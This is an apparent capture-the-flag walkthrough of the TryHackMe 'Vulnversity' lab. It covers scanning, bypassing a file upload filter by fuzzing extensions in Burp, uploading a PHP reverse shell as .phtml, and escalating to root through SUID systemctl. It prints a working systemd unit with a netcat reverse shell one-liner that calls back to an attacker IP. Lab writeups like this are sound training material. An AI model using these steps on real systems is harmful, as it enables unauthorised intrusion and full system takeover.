TryHackMe-Vulnversity
We begin with an Nmap scan “nmap -sV 10.10.29.44”. We notice a webpage running at port 3333.
We run Dirb to find hidden directories using the command
and find a few directories such as /internal and /internal/uploads ,Opon visiting the /internal directory, we see a file upload feature.
Our next move must be to try uploading a php reverse shell. However we are unable to upload any random file with the extension .php or .jpg or .png so we use burpsuite and try to fuzz which extension can be uploaded.
MOVING ON TO BURP
To do so, simply capture the request while Clicking on SUBMIT and the traffic will be intercepted.Now send the captured request to Intruder in Burpsuite.In the payloads position, select the value from before . (dot) and load the following words as shown.
NOTE: the php extension wordlist can also be found on this guithub repo-https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/file-upload/alt-extensions-php.txt
Now START the Attack
You will see that The length of phtml will be very different (727) while all other extensions show 737 in length.If you click on render response in case of phtml , you will see that it is accepted! This means we can simply upload a php shell using the extension “.phtml”
Download the php reverse shell from here-https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
Make sure to edit the code above and change the IP and Port accordingly and save it with a .phtml extension instead of .php
Now simply upload the revershell in the webpage,and make a netcat listener ready ( nc -nvlp 1234 )
In order to execute the php reverse shell, just visit the directory /internals/uploads
and click on the php reverse shell (php-reverse-shell.phtml) and Volia, we get a shell on our netcat
Now Just move to /home directory and the /bill where you will find the user flag.
ROAD TO ROOT (PRIVILEGE ESCALATION)
Now this is where the real deal begins.We need to look for SUID files.To do so we always use this following command which you must note down as you will use it often for privilege escalation.
find / -perm -u=s -type f 2>/dev/null
We find a file called systemctl (google what it does). We can visit GTFO Bins and search for systemct.We will soon be using the commands shown here.
Also do read this small article which shows us how to privilege escalate using systemctl
EXPLAINATION- Now this can be a bit challenging but basically this is what we will do.We have to make a few changes to the code shown in GTFO Bins.What changes you ask, we will replace $TF with eop (any random word, if you look at the line starting with Execstart, we will replace “id” whith the command we want to run.In our case, a netcat reverse shell.In the lasy two lines starting with ./systemctl, we just have use the proper path which in our case is /bin/systemctl)
The netcat reverse shell command can be found online.We have used the one highlighted.
SO MAKE SURE YOU HAVE A NETCAT LISTENER READY AT PORT 8080 AND THESE ARE THE COMMAND WE HAVE TO RUN LINE BY LINE.
eop=$(mktemp).service
echo '[Service]
ExecStart=/bin/sh -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> 8080 >/tmp/f"
[Install]
WantedBy=multi-user.target' >$eop
/bin/systemctl link $eop
/bin/systemctl enable --now $eopOnce you run the command shown above, you will get a root shell on your netcat listener.Volia we are ROOT. The root flag can be found in /root directory.
I hope you found this writeup helpful.In case the privilege escalation part was not clear, try reading other writeups or watching video walkthroughs. -ZEUS
